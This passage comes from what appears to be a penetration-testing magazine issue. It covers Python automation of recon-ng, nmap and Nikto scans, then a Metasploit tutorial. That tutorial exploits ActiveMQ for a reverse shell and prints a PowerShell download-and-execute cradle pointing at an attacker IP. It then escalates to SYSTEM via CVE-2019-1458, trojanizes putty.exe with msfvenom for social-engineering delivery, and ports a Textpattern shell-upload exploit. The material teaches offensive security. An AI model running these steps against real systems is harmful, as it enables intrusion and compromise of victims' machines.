As a concept, we only use tools that offer one of two things – CLI commands and/or an API. This way we can decide whether
to use the API or just send the command to bash to run it. It’s as simple as that, so no matter what tool you decide to use,
unless you’re coding it from scratch, one of these two conditions needs to be met. If not, the tool is out.

Reuse of information

This is a very important part of the concept. We don’t want to keep piling up information and not properly use it. The goal
here, as the Mitre Attack framework is complex, is to use the information collected from one tool to be the base information
on what the other tools will run.


You can do this for tools inside the same category or move the information to tools in different categories. Nevertheless,
don’t get different tools to get the same information. It’s a waste of time and computing resources and, as the solution
grows, you’ll need all the time and resources you can get.

For this article, we’ll keep it simple – we use files to store and process our collected information. This way we can always
audit what we collected, insert values manually from our manual research or check if errors occurred. Another option
would be to use databases.

Another thing we’ll do is gather all the information (optional and you might choose to go with a different solution) in a
centralized repository of findings. I’m a big fan of Faraday open source. So, we only use tools that are supported
out-of-the-box by Faraday. You can learn more about this project and the 70+ tools it supports here -
https://github.com/infobyte/faraday

There were some time restrictions when writing this article and for this reason we won’t be integrating our tools with the
API section of Faraday. This would be ideal, as we could then also use it to extract specific information about the hosts
through the API. As you’ll see, we’ll be using (not tested during my setup) the report upload option. You can learn more here -
https://github.com/infobyte/faraday/wiki/Plugin-List#report

Also, you might need to tweak the file names to be accepted. As mentioned before, I didn’t go through this part as much as I
would like to. For instance, in the recon-ng tool, you probably should not use JSON format for the output but instead XML.
For this reason, we are also going to add some code to the “if” part since we’ll need to look into files.

Two things to retain:

• Using files instead of Faraday will give you more flexibility on your Mitre Att&ck framework deployment.

• Using Faraday API will make the coding much easier to get the specific information you require about the hosts to
make decisions.


Remember that the Faraday server does not run on standard ports, so to access the server you’ll need to connect, for instance, to TCP 5985. This can
be changed in the config file mentioned on Github. Also, please make sure you change the config file “BIND” from localhost to 0.0.0.0 so you can
connect from the internet.

Remember that this deployment is not secure (no certificates or WAF) so if you’re thinking of putting it in production, make sure you use the paid
version (for support and more functionality) and you properly deploy it.

RECONNAISSANCE MODULES

Gather Victim Network Information

Recon-ng

Before compromising a victim, adversaries may gather information about the victim's networks that can be used during
targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges,
domain names, etc.) as well as specifics regarding its topology and operations.

Adversaries may gather this information in various ways, such as direct collection actions via active scanning or phishing
for information. Information about networks may also be exposed to adversaries via online or other accessible data sets (ex:
Search Open Technical Databases).[1][2][3] Gathering this information may reveal opportunities for other forms of
reconnaissance (ex: Active Scanning or Search Open Websites/Domains), establishing operational resources (ex: Acquire
Infrastructure or Compromise Infrastructure), and/or initial access (ex: Trusted Relationship). [source:
https://attack.mitre.org/techniques/T1590/].

Going back to our structure (the most important part of coding besides algorithms), we’ll need to:

• Provide a domain.

• Start a discovery.

• Collect the data to a file.

• Upload the report to Faraday.

There are multiple tools out there that you can use to start your passive scanning and recon. In our case, we’ll go with
recon-ng as it offers a CLI version and integrates with Faraday. It’s out of the scope of this article to dig into the many
uses recon-ng allows, as it’s a very powerful tool. I do encourage the reader to explore all the capabilities and perfect the
command we are using.

That said, we’ll be running the following command:

recon-cli -m recon/domains-hosts/hackertarget -o SOURCE=hackin9.org -x >> recon-ng.txt

Explanation:

• We are using the module hackertarget that I’ve installed via recon-ng.

• We are starting to discover hackin9.org.

• We are saving the results to recon-ng.txt.

From a coding point of view, what we want to achieve is:

• Run a CLI command on Kali that will take one input – the Domain.

• Insert the user given domain in the cli command.

• Create a report.

• Import the report to Faraday server.

Code

Let me explain to you how simple the code is:

import os


class recon_ng:
    def __init__(self, domain):
        self.domain = domain

    def recon_ng(self):
        # Run the hackertarget module against the given domain, inside a workspace
        # named after the domain so the JSON export below finds the same results
        os.system(f"recon-cli -w {self.domain} -m recon/domains-hosts/hackertarget -o SOURCE={self.domain} -x")
        # Export the workspace to JSON so the report can be imported into Faraday
        os.system(f"recon-cli -w {self.domain} -m reporting/json -o FILENAME=/home/bmrodrigues/MitreAtt/recon-{self.domain}.json -x")
        print('Please insert password to upload report to Faraday server: \n ')
        os.system(f'scp /home/bmrodrigues/MitreAtt/recon-{self.domain}.json zeususer@52.168.1.180:~/')

We start by importing the Python library os. We then proceed to create a class for the recon-ng program, so we can create
objects that take the input “Domain” and output a result file and report. The special __init__ function always asks for a
domain, and this will be the only time we are going to request an input from the user. After that, everything that will be used


is available information. It’s that simple. We won’t be needing the __init__ function anymore. This means that every time we
call the recon_ng class, we’ll need to provide it with a domain name.

This domain name is then passed to the function that will run recon-ng and upload the result to Faraday. The os.system
calls are the commands we want to run on the shell, making it easier for you to customize them.

The commands we are using are:

1. From recon-cli

a. We set up our special __init__ function to get the domain name.

b. We create a workspace with -w to store our results.

c. We use the hackertarget module.

i. Source will be populated once we provide the domain.

d. We then run a second command to export the workspace results to json format, so we can import it into
Faraday.

2. For Faraday

a. We just upload the report to it and it should do the trick, according to this: “Plugins that import file reports.
You have to copy the report to ~/.faraday/report/{workspacename} (replacing {workspacename} with the
actual name of your Workspace) and Faraday GTK client will automatically detect, process and add it to the
HostTree. If Faraday is not capable to detect the plugin needed to process the report, you can manually choose
which plugin will be used by adding _faraday_pluginName to the file name before the extension.”

Nmap

Now that we have started our passive scanning, we want to move on in the framework and do some active scanning. We’ll be
using nmap to achieve our goal. This will allow us to get a clear view of IPs, open ports, running services, OS versions and
some vulnerabilities. I say vulnerabilities because I’m not going to be nice with this scan and we’ll run it in aggressive
mode:

nmap -A {host} -oX {host}.xml

We’ll be running this command for all IPs found from Recon-ng. So at the end of the day, you’ll have multiple files, one per
host, added to your Faraday.

So, what are we running:

• -A we are running Nmap in aggressive mode.


• We are going to loop through the IPs on the json file from Recon-ng.

• And we are saving our output to an XML file where we take the IP to make it unique. (Again, you might need to
tweak this file name so Faraday can pick it up. Didn’t test it.)

So, this is how the code looks:

import os
import json


class nmap:
    def __init__(self, domain):
        self.domain = domain

    def nmap_scan(self):
        # Read the host list that recon-ng exported for this domain
        with open(f"recon-{self.domain}.json", 'r') as file:
            jsonfile = json.load(file)
        for item in jsonfile['hosts']:
            ip = item['ip_address']
            # Aggressive scan; the XML output is named after the IP so each file is unique
            os.system(f'nmap -A {ip} -oX {ip}.xml')
            print('Please insert password to upload report to Faraday server: \n ')
            os.system(f'scp {ip}.xml zeususer@52.168.1.180:~/')

Code details:

• We start by importing 2 libraries – os and json

• We create our own nmap class


• Get the __init__ function so we can pass the domain name

• Create a function to run our nmap and upload it to Faraday

The IF part

This is where the fun begins. Until now, we were required to run both applications above, because we need that
information. But now that we have the Nmap scan, we need to make decisions on what to use based on our findings. Just as
a hacker would do. FUN!

Disclaimer – there is a part of the code that I had no time to put in but maybe you, the reader, can ping me on LinkedIn and
suggest a way to sort the problem. What part of the code? Where we check ALL the Nmap created files and not the static
one configured on the code below:

import os
from xml.dom import minidom

from nikto import nikto


class if_ports:
    @staticmethod
    def check_ports():
        # Static file name for now (see the note above about looping over all Nmap files)
        nmap_file = minidom.parse("nmap_104.200.23.95.xml")
        # Take the IPv4 address of the host; a second <address> element, if present, is the MAC
        ip_address = None
        for address in nmap_file.getElementsByTagName('address'):
            if address.getAttribute('addrtype') == 'ipv4':
                ip_address = address.getAttribute('addr')
        ports = nmap_file.getElementsByTagName('port')
        for port in ports:
            if port.getAttribute('portid') == '80':
                # Web port found: hand the IP over to the Nikto class
                nikto_scan_ip = nikto(ip_address)
                nikto_scan_ip.nikto_scan()
            elif port.getAttribute('portid') == '22':
                print('do other stuff, like ssh Brute Force (use Hydra :-)')
            else:
                print('ENDED !')

So what have we done here? We also created a class, but this time we don’t require the __init__ method. Why? Because we
don’t need inputs; we’ll just take what we need from the information we already have – in this case from the Nmap scans (now
that I think about it, the input could be the Nmap scan file… maybe… I’ll let you decide).

The important part is the for port in ports loop and the if statements that follow, which make this Mitre Att&ck app more
flexible. You can add more tests and tools as you go, each with a simple elif statement.

So we are looping through the file records after parsing the XML, and then we look for port 80 (web); if we find it, we run the
next program we wrote – the Nikto class.

If we find port 22, I suggest we run Hydra (another class but, as an example, it will just print the info). And we pass the IP
of that host to the next class as its input. How cool is that?
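As an added example (not code from the article), the following Python walks every nmap XML report in a directory instead of the single hard-coded file, which is the gap the author mentions above; it also reads each port's state and nmap's service name, so filtered ports do not trigger follow-ups and web servers on non-standard ports are still routed to the Nikto step. The nmap XML inside the block is constructed sample data, and the action labels ("nikto:<port>", "ssh-followup") are conventions assumed by this example.

```python
import glob
import os
import tempfile
import xml.etree.ElementTree as ET

# Decision table. The article keys only on portid 80; here the well-known web
# ports and the service name nmap assigns are both used, so a web server on
# e.g. 8080 is still queued for the web scanner.
WEB_PORTS = {"80", "443"}
WEB_SERVICES = {"http", "https", "http-alt", "http-proxy"}
SSH_PORT = "22"

# Constructed sample of nmap -oX output (not a real scan), using documentation
# addresses. Host .10 also carries a MAC <address> element, which is what the
# article's ip[1] indexing would have picked up by mistake.
SAMPLE_NMAP_XML = """<nmaprun scanner="nmap">
<host><status state="up"/><address addr="192.0.2.10" addrtype="ipv4"/><address addr="00:11:22:33:44:55" addrtype="mac"/>
<ports><port protocol="tcp" portid="22"><state state="filtered"/><service name="ssh"/></port>
<port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port>
<port protocol="tcp" portid="443"><state state="open"/><service name="http" tunnel="ssl"/></port></ports></host>
<host><status state="up"/><address addr="192.0.2.20" addrtype="ipv4"/>
<ports><port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
<port protocol="tcp" portid="8080"><state state="open"/><service name="http-proxy"/></port></ports></host>
<host><status state="down"/><address addr="192.0.2.30" addrtype="ipv4"/></host>
</nmaprun>"""

# A second constructed report, so the directory walk has more than one file.
SECOND_REPORT_XML = """<nmaprun scanner="nmap">
<host><status state="up"/><address addr="192.0.2.40" addrtype="ipv4"/>
<ports><port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port></ports></host>
</nmaprun>"""


def host_ipv4(host):
    """Return the IPv4 address of an nmap <host> element, never its MAC."""
    for addr in host.findall("address"):
        if addr.get("addrtype") == "ipv4":
            return addr.get("addr")
    return None


def open_ports(host):
    """Yield (portid, service_name) for each port nmap reported as open."""
    for port in host.findall("./ports/port"):
        state = port.find("state")
        if state is None or state.get("state") != "open":
            continue  # closed/filtered ports must not trigger follow-ups
        service = port.find("service")
        name = service.get("name", "") if service is not None else ""
        yield port.get("portid"), name


def decide_actions(xml_text):
    """Map each live host in one nmap XML report to the follow-up checks to queue."""
    decisions = {}
    for host in ET.fromstring(xml_text).findall("host"):
        status = host.find("status")
        if status is not None and status.get("state") != "up":
            continue  # nmap lists hosts that did not answer; skip them
        ip = host_ipv4(host)
        if ip is None:
            continue
        actions = set()
        for portid, name in open_ports(host):
            if portid in WEB_PORTS or name in WEB_SERVICES:
                actions.add(f"nikto:{portid}")  # web service -> the Nikto class
            elif portid == SSH_PORT or name == "ssh":
                actions.add("ssh-followup")  # the article's port 22 branch
        decisions[ip] = sorted(actions)
    return decisions


def decide_all(report_dir):
    """Run decide_actions over every *.xml report in report_dir (the missing loop)."""
    merged = {}
    for path in sorted(glob.glob(os.path.join(report_dir, "*.xml"))):
        with open(path, encoding="utf-8") as fh:
            merged.update(decide_actions(fh.read()))
    return merged


def demo():
    """Write the two constructed reports to a temp dir and process them all."""
    with tempfile.TemporaryDirectory() as report_dir:
        reports = (("192.0.2.10.xml", SAMPLE_NMAP_XML), ("192.0.2.40.xml", SECOND_REPORT_XML))
        for name, text in reports:
            with open(os.path.join(report_dir, name), "w", encoding="utf-8") as fh:
                fh.write(text)
        return decide_all(report_dir)


if __name__ == "__main__":
    for ip, actions in demo().items():
        print(ip, actions)
```

Each entry in the returned dictionary is the decision the if_ports class would act on; wiring the labels to the nikto class (or any other follow-up) is a one-line dispatch per label.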

Nikto

Now the real fun begins. We are moving away from the “we need to run this” to the “if” phase. Why do I say “if” phase?

Nikto is an Open Source (GPL) web server scanner that performs comprehensive tests against web servers for multiple
items, including over 6700 potentially dangerous files/programs, checks for outdated versions of over 1250 servers, and
version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple
index files, HTTP server options, and will attempt to identify installed web servers and software. [source:
https://cirt.net/Nikto2]

That means that we are only going to run Nikto against hosts or IPs that we know are web servers. How do we accomplish
that? We’ll need to check the files created by Nmap and make an if decision. You’ll see that on the main program – if we
have ports 80 or 443 open (it could be more complex since we can have web services running on non-standard ports, but
we’ll keep it simple for the article) then we create a new file and run through that file using Nikto.

Two reasons why we don’t run through the IP file even if the IP has no web server:

1. When you code, you want it to be as clean as possible and avoid unnecessary coding. This makes the program
faster and easier to understand. In a huge framework like the one we are trying to pursue, size becomes a
problem.


2. Second, Nikto does run a lot of tests and this will take some time. So we need to make sure we only use required
resources.

The command we are running from Nikto is – nikto -h {ip} -o nikto_{ip}.xml -Format xml

So, the code we have is pretty simple:

import os


class nikto:
    def __init__(self, ip):
        self.ip = ip

    def nikto_scan(self):
        # Web server scan; the XML output is named after the IP so each file is unique
        os.system(f'nikto -h {self.ip} -o nikto_{self.ip}.xml -Format xml')
        print('Please insert password to upload report to Faraday server: \n ')
        os.system(f'scp nikto_{self.ip}.xml zeususer@52.168.1.180:~/')

We create a class called nikto, with the __init__ function requiring just the IP (we get that from if_ports.py by checking the
nmap XML files for web ports), run the Nikto command and finally upload the result to Faraday.

CONCLUSION

I really hope you enjoyed this approach and my goal here was to create a flexible program with Python that will allow you to
create most of the Mitre Att&ck attacks in an autonomous way, allowing you to focus on what’s important – finding bugs.

I know there are a couple of things missing from the code that I previously mentioned but I was out of time to submit to
publish. This way you have a challenge to continue my work.

All comments, ideas, suggestions are more than welcome and you can ping me on my email – brurod[at]gmail.com

MANUAL PENTESTING? AUTOMATE IT WITH METASPLOIT

THOMAS MOOSMÜLLER

Thomas Moosmüller is the CEO of BreakinLabs and a specialist in penetration testing, vulnerability assessments, and social engineering. Thomas holds various certifications including CISSP, C|EH, OSCP, OSCE, and has a Master’s degree in Informatics.

BreakinLabs is the creator of www.hackinlabs.com, a virtual environment that recreates a company with many vulnerabilities and various subnets. Every customer can practice the different exploit techniques on the different hosts with the help of our courseware and some hints, if required.

Visit us on www.breakinlabs.com for penetration testing, live hacking, and consulting or on www.hackinlabs.com to learn how hacking and penetration testing works for yourself!

80
Manual Pentesting? Automate it with Metasploit

INTRODUCTION:

Metasploit is a heavyweight in the field of hacking and is an almost worry-free package. Metasploit's main focus is the
exploit phase of hacking, but it also provides useful tools in information gathering and can centralize it in one place.

WHAT IS METASPLOIT?

Metasploit is an open-source project and is currently developed and published by Rapid7. There is a free version of the
"Metasploit Framework" as a console tool and an additional paid version with some features such as a browser-based GUI
and further automation. I believe the free version is suitable for everyone who wants to learn with Metasploit. This article
refers exclusively to the free version of Metasploit.

Metasploit is a very comprehensive tool and includes the exploit framework as well as several other tools for creating exploit
code and payloads, which can also be used outside the actual Metasploit environment. In addition to the Metasploit Console
("msfconsole"), these include payload generation and encoding (msfvenom), the module especially for advanced Windows
exploits (msfrop), and an advanced payload with in-memory DLL injection called "meterpreter".

INSTALLATION:

Since Metasploit is a standard program in penetration testing, it is already included in a large number of distributions (Kali
Linux, Parrot, etc.) and does not need to be installed separately. If this is not the case, there is a detailed manual on the
Rapid7 Github repository:
https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment

After installation, the PostgreSQL service must be enabled and started. The added database must also be initialized with the
command "msfdb init".

LAUNCH METASPLOIT:

The Metasploit Console can be started with the command "msfconsole". The start screen looks like this:


In addition to the version, the scope of exploits and other scripts contained in the database are also displayed.

SHOW COMMAND:

The show command lists the available modules of a given kind (show auxiliary, show exploits, show options, ...). The module types are:

auxiliary (scanners, sniffers, fuzzers, brute forcers and other helpers that do not deliver a payload)

payloads (the code that runs on the target after a successful exploit and sets up the remote connection)

encoders (re-encode payloads, originally to avoid bad characters, nowadays often also for AV evasion through polymorphic encoding)

nops (padding that extends a payload to a required size)

exploits (modules that trigger a vulnerability and deliver a payload)

plugins (integrations of external programs such as nessus, openvas, nexpose, etc.)

post (post-exploitation of compromised targets and pivoting deeper into a network)

The separate command info <module> shows the details of a specific module.

SEARCH COMMAND:

Using search <search term>, all modules are searched for the term and the matches are displayed. Let's assume that you want to exploit a Jenkins server. So you use "search jenkins" and check the output:

Metasploit has now found several different types of modules. The auxiliaries primarily relate to the collection of information, which is also clear from the descriptions (Scanner, Recovery, Enumeration). Starting with number five, the various exploits follow, each listed with its Disclosure Date and Rank (Metasploit's rating of how reliable the exploit is and how likely it is to crash the target; "excellent" means it should never take the service down). The Check column states whether the module has a check routine, i.e. whether the server can be tested for the vulnerability before actually exploiting it. The last entry is a post-exploitation module that can read the Jenkins user logins after a successful exploit.

The search command also supports narrowing the results with keywords such as "type:", "name:" and "platform:". For example, "search type:exploit platform:windows" lists all exploits that target Windows itself.


EXAMPLE: EXPLOITATION PROCESS

Initial Exploit:

I would now like to show you the various functions of Metasploit using a direct example. For this purpose, I have installed a Windows 7 system with Apache ActiveMQ.

As already mentioned, Metasploit integrates various other scanners and tools. One of these is nmap, which we can run directly from the console with db_nmap so that its results land in the Metasploit database. We use it to perform a port scan on the target:

I have limited myself to a specific default port here to keep the output clear. Nmap's scan found a Jetty servlet engine (the web server embedded in Apache ActiveMQ) running on the target machine, and the http-title displayed already tells you which software it is.

So we use the "search" command shown earlier and specifically look for an exploit for ActiveMQ:

Finally, we are shown three exploits, all of which are ranked excellent and thus have a high probability of success. My experience from past penetration tests tells me that we will have the best success with the third exploit (apache_activemq_traversal_upload).


Insertion: use command

With the help of "use <module>" a specific module can be loaded. This is then directly available and can be filled with the
data of the target or executed directly.

We now use "use" to load the selected module, which is loaded with its default settings:

We have already learned about the "show" command. Inside a loaded module, "show options" displays the module's parameters. Often, some fields are already pre-filled with the default settings of the target software. ActiveMQ, for example, ships with the user "admin" and the password "admin", and port and path are rarely changed, so they are pre-set as well.

The module options are directly related to the selected exploit and its required parameters, such as login data, paths, IP addresses and ports, proxy servers, virtual hosts for downloading data, and much more.

The payload options determine what runs on the target after exploitation and how the connection to it is established: bind shells, reverse shells, web shells, Meterpreter, and others. "show payloads" inside a module lists only the payloads compatible with it.

Finally, the target must be specified ("show targets"). Here it is important to know whether you are attacking a Linux or Windows server, or whether the target is a specific type of web application.

We fill the options marked as required with our data, i.e. RHOSTS (the IP of the target) and LHOST (our IP for the reverse shell; the default payload is java/jsp_shell_reverse_tcp), and execute the exploit with the command "exploit".


Very nice! We succeeded with the exploit and opened a command shell to our target. As you can see, we can directly execute commands on the command line of the target and have the rights of a user named "bobby". So the ActiveMQ service has at least been somewhat secured: it runs under a dedicated account rather than the administrator account.

Privilege Escalation:

Insertion: sessions

Metasploit makes it possible to work with multiple sessions in parallel and thus to put active shells on targets into the background.

With the command "background" (or Ctrl+Z) we drop the shell and get back to the Metasploit prompt. All sessions in the background, together with their details, are listed with "sessions" (or "sessions -l"). This includes the ID of the session, the type (i.e. what kind of shell it is), information about the target system (operating system and version) as well as the IP address of the target and the corresponding port.

"sessions -i <ID>" pulls the session with that ID from the background into the foreground and connects us to it.

Under Type, we see that currently a "shell java/linux" is used. This sounds a bit strange, since we are attacking Windows, but in the end it is only a Java shell spawned by the JSP payload. With it we can execute some commands on the system, but that doesn't get us very far. After all, our goal is to take over the administrator account and its rights.


To do this, we use a module called "web_delivery" (exploit/multi/script/web_delivery). It hosts a payload on a web server we control and prints a one-liner for a command interpreter on the target (for example, PowerShell, Python, or the command line) that downloads the payload from our machine and executes it in memory.

So we first display the options so that we know exactly how the module works and which parameters have to be set.

Fine, SRVHOST and SRVPORT tell us that the payload is served from our current IP, on port 8080 by default. We are not using SSL, and a randomly generated URI path is absolutely sufficient for our purposes. Now, for the payload, a Python Meterpreter payload is suggested. Unfortunately, this is not as powerful as a native Windows Meterpreter payload, so we change it. Afterwards, we have to define the IP Meterpreter should connect back to (LHOST) and the port the reverse shell should use (LPORT).

Now there is the field "target". Using "show targets" we can display the available targets:


For our purpose, PowerShell, the standard Windows tool, is highly suitable. So we use number two (PSH) as the target.

Then we run the script with the command "run".

We are given a rather cryptic command to execute on the target computer. It is a call to powershell.exe with a base64-encoded (UTF-16LE) script passed via -e; decoded, the script uses PowerShell to download the payload from our machine and execute it in memory:

[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;
$n=new-object net.webclient;
if([System.Net.WebProxy]::GetDefaultProxy().address -ne $null){
    $n.proxy=[Net.WebRequest]::GetSystemWebProxy();
    $n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;
};
IEX ((new-object Net.WebClient).DownloadString('http://192.168.150.166:8085/Vc3TT9xumfRg/EuNTe0ltjSydvE'));
IEX ((new-object Net.WebClient).DownloadString('http://192.168.150.166:8085/Vc3TT9xumfRg'));

So we execute the string on the target system ...


... and get a Meterpreter reverse shell after a few seconds' delay, which we can verify with "sessions".

Insertion: Meterpreter

Meterpreter is a full-featured post-exploitation agent with a variety of tools that could fill a separate article. Meterpreter works with an in-memory DLL injection (the stager loads a reflective DLL without writing it to disk) and can migrate between processes. It resides exclusively in memory and is not stored on disk. Communication between the handler and Meterpreter is encrypted. All of this makes the traceability of Meterpreter attacks correspondingly more difficult. Meterpreter is used for privilege escalation, port scans, traffic redirection, file downloads and uploads, and much more. More information about Meterpreter can be found at the link: https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/

Metasploit has a script that checks for various exploits based on the target system and its patch level and returns a list of
exploits that may work.

We use the search again for this and then load the local_exploit_suggester tool. After passing the session, we can directly
search and display the exploits:


A quick check of the displayed exploits on Microsoft's website reveals that a broad range of Windows versions (Windows 7, 8.1 and Windows 10 up to version 1607, as well as the corresponding server releases) is affected by CVE-2019-1458, so the target system is most likely vulnerable:

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-1458

Therefore, we use this exploit and load it into Metasploit. The display of the options shows that only the listener port of our
system must be set accordingly, and the session stored in the background has to be loaded:


We then run the exploit:

Wonderful! We see that the exploit re-checked the system for vulnerability and then loaded the exploit using notepad.exe.
Finally, a new Meterpreter session was loaded via a second stage.

Using "getuid", Meterpreter can show us the permissions of the active account:

Perfect! We have even exceeded our goal of the administrator and have "NT AUTHORITY\SYSTEM" the very highest rights
that are possible with a Windows system.

Using Meterpreter, we can also, for example, create screenshots or open a normal command shell and use it:


MSFVENOM:

Another part of Metasploit is the stand-alone tool "msfvenom", which was created from the former "msfpayload"
(generation of shellcode) and "msfencode" (encoding of shellcode).

With msfvenom, both parts have been combined and merged into one tool that offers a wide range of possibilities from
generating simple shellcode to creating polymorphic Trojans.

There are about 550 different payloads available, which can be displayed with "msfvenom -l payloads".

As a small example:


The payloads range from different connection types, web shells (php, java, aspx, etc.), different operating systems
(Windows, Linux, Android, MacOS, etc.) to different architectures (x86, x64). So-called stageless and staged shellcodes can
also be generated.

For staged shellcodes (notation with slash /, for example, windows/shell/reverse_tcp), a small dropper is created that
reloads the primary shellcode on the target machine. Stageless shellcodes (notation with underscore _, e.g.
windows/shell_reverse_tcp) create the complete shellcode at once.

As an example, the creation of a Meterpreter reverse shell as an .exe is shown here. Note that windows/meterpreter/reverse_tcp is the staged variant (slash notation); the stageless equivalent would be windows/meterpreter_reverse_tcp:

-p windows/meterpreter/reverse_tcp means that the Meterpreter payload for Windows is used and that it
should connect back to us over TCP.

LHOST/LPORT are the IP address and the port of the computer which should accept the response of the
meterpreter shell.

-f is the output format. In this case .exe for Windows.

> spl0it.exe means a redirection of the shellcode, which is normally printed in the console, into a new file.

However, we can also introduce this type of Trojan into an existing program.

Let's take a tool that very many of you probably know: putty.exe

First, we Trojanize the tool using msfvenom and a normal Windows reverse shell.

New parameters are "-x", which specifies the file to be Trojanized, "-k", which starts the Trojan as a separate thread on the
target so that the running program is not interrupted, and "-o", which is a different notation for ">", i.e. the output as a file.


Now we start a Netcat listener and transfer the file to the target (in the professional area: e.g. through social engineering):

After launching Trojanized Putty, we do not see anything noticeable at the target. The software itself also works properly
and will not cause any errors.

However, our Trojan was running in the background and it connected to the attacker's computer and opened a command
shell:

Beyond that, msfvenom is the tool of choice for producing the shellcode used in your own custom exploits.


Let us assume that we have created an exploit for a web server and now we need a suitable shellcode for the intrusion. With
the help of msfvenom, we can create it within minutes.

The command remains almost the same - only the output format changes from exe to py (Python), and we use "-b <hex>" to exclude the so-called bad characters (bytes such as \x00 that the vulnerable program would truncate or mangle and that would otherwise crash the exploit).
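Two things a practitioner wants right after generating shellcode with -b are to verify that the bad bytes really are absent from the output and to turn the Python-format listing back into raw bytes for a loader or a size comparison. The shell functions below are an added example, not part of the article or of msfvenom itself; the byte strings used to exercise them are constructed, not real msfvenom output.

```bash
#!/usr/bin/env bash
# Added example, not the article's: two checks on msfvenom's Python-format output
# (-f py) before pasting it into your own exploit. The sample buffers used for
# testing are constructed, not real msfvenom output.

# shellcode_bytes: read lines like  buf += b"\x31\xc0"  on stdin and print one
# lowercase hex byte per line (no \x prefix), in order.
shellcode_bytes() {
  grep -o '\\x[0-9a-fA-F]\{2\}' | cut -c3- | tr 'A-F' 'a-f'
}

# check_badchars '\x00\x0a...' (py output on stdin): print every listed byte that
# still occurs in the shellcode; return 0 if clean, 1 if any bad byte is present.
# -b only guarantees what you asked for; a typo in the list or a forgotten byte
# (e.g. \x0d for something parsed by an HTTP stack) slips through silently otherwise.
check_badchars() {
  local bad=$1 bytes b rc=0
  bytes=$(shellcode_bytes)
  for b in $(printf '%s' "$bad" | shellcode_bytes); do
    if printf '%s\n' "$bytes" | grep -qx "$b"; then
      echo "bad byte \\x$b present"
      rc=1
    fi
  done
  return $rc
}

# py_to_bin <outfile> (py output on stdin): write the raw bytes, e.g. to feed them
# to a loader or to compare the size with 'msfvenom -f raw'. Octal escapes are used
# because POSIX printf understands \ddd but not \xHH.
py_to_bin() {
  local fmt
  fmt=$(for b in $(shellcode_bytes); do printf '\\%03o' "$((0x$b))"; done)
  printf "$fmt" > "$1"
}

# Example wiring (commented out: needs msfvenom on the box; LHOST/LPORT are assumed):
#   msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f py \
#     -b '\x00\x0a\x0d' -e x86/shikata_ga_nai > sc.py
#   check_badchars '\x00\x0a\x0d' < sc.py && py_to_bin sc.bin < sc.py
```

Run check_badchars with exactly the list you passed to -b; if it reports a byte, regenerate with that byte added, or with another encoder, before spending time debugging the exploit itself.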

A special feature in this case is the use of a polymorphic encoder for our shellcode. Did you notice "x86/shikata_ga_nai" in the 6th line?

This encoder changes the generated shellcode every time msfvenom is executed: a random key and a randomly chosen decoder stub wrap the original payload, so the bytes differ from run to run while the decoded code performs the same action.

I have run the same command again in the screenshot below - do you see the difference?


CREATE YOUR OWN METASPLOIT MODULES

Metasploit is rounded off with the possibility of attaching or editing your own exploits as a module.

Rapid7, the company behind Metasploit, has only very limited documentation on the inner workings of their tool. There are
four main sources to find out how to write an exploit using the Metasploit abstracted functions.

1. The Rubydoc on Metasploit Documentation for rapid7/metasploit-framework (master) (rubydoc.info)

2. The Metasploit Github: GitHub - rapid7/metasploit-framework: Metasploit Framework

3. The Offensive Security articles Creating Our Auxiliary Module - Metasploit Unleashed

4. Other modules that are already part of Metasploit

From the second one, we get the paths where the modules are saved on the filesystem, at least on Kali Linux.


Your new module will end up in one of these folders from where it can be called inside msfconsole.

You also could find some blueprints in the folder “exploits” as ruby files.

Here we will have a look at the web app exploit example.

The file is split into three sections that make up most Metasploit modules. An initialization function, a check function, and
the exploit function. There you describe the exploit and its nature, check the web app for the vulnerability, and exploit it, in
that order.

Initialization:


This part is mostly self-explanatory and well documented in the file. Give the name, the description, and the license the
exploit is supposed to have. List yourself as the author and references to CVE or ExploitDB. Lastly, give details about the
platform the web app is running on and if the exploit gives you privileged access.

The only available documentation on the used classes is on the rubydoc.

Class: Msf::Exploit::Remote

Module: Msf::Exploit::Remote::HttpClient


Under “register_options”, all important parameters can be specified that are needed for the exploit to run. In this
exploit, the web URL and the login data play an important role.

Check

Optionally, a module implements a check routine, which Metasploit runs with the "check" command before the actual exploit; it is also what the Check column of the search output refers to. The check can look, for example, for a special response from the webserver or an existing banner on a port. Mostly this consists of a reachability and version check. The "Rex" and "Gem" classes can be explored in the rubydoc. For example, the class Rex::ConnectionError: Exception: Rex::ConnectionError - Documentation for rapid7/metasploit-framework (master) (rubydoc.info).


Exploit

This is the main part of the module. For web apps, this part usually consists of one or two steps. Often, something is
prepared first, so for example, the exploit authenticates itself or navigates to the page once to get a certain cookie. The
second part is the HTTP payload. This is usually a POST request for a php shell upload or a GET request for the execution of
a php command on the webserver.


Example: translating an exploit to a working Metasploit module

Here we will have a look at the Textpattern 4.8.3 Authenticated PHP Shell upload. The Python source code is available on
ExploitDB. Let’s start with creating the ruby exploit file and filling in all the obvious things in the Metasploit Exploit.

We start with a copy of the "example_webapp.rb" and store it under "exploits/unix/webapp".


It is best to fill in the fields in such a way that you can later quickly identify which exploit it is and how it works.

Textpattern does not display its version to unauthenticated users as any modern web app should. So for the check, we can
simply see if the HTTP server can be reached.

Here I just use the methods provided by the example file. As always, these Classes and Functions can be explored via the
rubydoc or on the Metasploit GitHub repository. For example the fail_with function: Class: Msf::Exploit — Documentation
for rapid7/metasploit-framework (master) (rubydoc.info).

Now to the main part of the module. The exploit. First, we have to understand how it works by looking at the Python source.


So it seems like the exploit authenticates with the user-provided credentials and uploads a php shell via the backend. The
first interesting function is login.

Here the session s and an authentication string _txp_token are retrieved.


While I was testing the exploit, which is something you should always do before trying to convert it to Metasploit, this part
didn’t seem to work. The _txp_token was not an HTML class of an <input> element on the entire page. But there was a
Json string at the beginning of the page that did. Another exploit TextPattern CMS 4.8.3 - Remote Code Execution
(Authenticated) - PHP web apps Exploit (exploit-db.com) had a method that worked. So I replaced it here.

Let’s translate this logic to Ruby. We can use the existing form in the web app example to log in. Sending HTTP requests is
